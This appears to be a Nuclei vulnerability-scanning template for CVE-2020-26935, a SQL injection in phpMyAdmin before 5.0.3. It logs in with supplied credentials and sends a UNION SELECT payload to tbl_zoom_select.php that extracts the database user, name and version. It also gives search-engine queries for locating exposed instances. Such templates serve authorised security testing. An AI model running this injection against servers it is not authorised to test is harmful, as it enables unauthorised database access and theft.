id: CVE-2020-26935

info:
  name: phpMyAdmin < 5.0.3 - SQL Injection
  author: 0x_Akoko
  severity: critical
  description: |
    phpMyAdmin before 4.9.6 and 5.x before 5.0.3 contains a SQL injection caused by improper processing of SQL statements in the search feature, letting attackers inject malicious SQL, exploit requires crafted search input.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
  remediation: |
    Update to phpMyAdmin 4.9.6 or 5.0.3, or latest version.
  reference:
    - https://www.phpmyadmin.net/security/PMASA-2020-6/
    - https://github.com/phpmyadmin/phpmyadmin/commit/d09ab9bc9d634ad08b866d42bb8c4109869d38d2
    - https://nvd.nist.gov/vuln/detail/CVE-2020-26935
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-26935
    epss-score: 0.89641
    epss-percentile: 0.9958
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 4
    shodan-query: http.title:"phpMyAdmin"
    fofa-query: app="phpMyAdmin"
  tags: cve,cve2020,phpmyadmin,sqli,authenticated

flow: http(1) && http(2) && http(3) && http(4)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "phpMyAdmin", "name=\"token\"")
        condition: and
        internal: true

    extractors:
      - type: regex
        name: token
        part: body
        group: 1
        regex:
          - 'name="token" value="([^"]+)"'
        internal: true

      - type: regex
        name: set_session
        part: body
        group: 1
        regex:
          - 'name="set_session" value="([^"]+)"'
        internal: true

  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        pma_username={{username}}&pma_password={{password}}&server=1&target=index.php&token={{token}}&set_session={{set_session}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, "pmaAuth-1=")
        condition: and
        internal: true

  - raw:
      - |
        GET /index.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "logged_in:true")
        condition: and
        internal: true

    extractors:
      - type: regex
        name: token2
        part: body
        group: 1
        regex:
          - 'token:"([^"]+)"'
        internal: true

  - raw:
      - |
        POST /tbl_zoom_select.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Requested-With: XMLHttpRequest

        db=testdb&table=users&where_clause=1=0 UNION SELECT 1,CONCAT(USER(),0x3a,DATABASE(),0x3a,VERSION()),3-- -&where_clause_sign=&token={{token2}}&ajax_request=true&get_data_row=true

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "\"success\":true", "\"row_info\"")
        condition: and

    extractors:
      - type: regex
        name: sqli_data
        part: body
        group: 1
        regex:
          - '"username":"([^"]+)"'
# digest: 4a0a00473045022100fc499567474340846fd1633cde77be357f3d3c310a0a5abe6552f6ae3fa828e70220538713865339bfafa86903f07433056bd57beb4a8103ffe2bdbc67cab423fa93:922c64590222798bb761d5b6d8e72950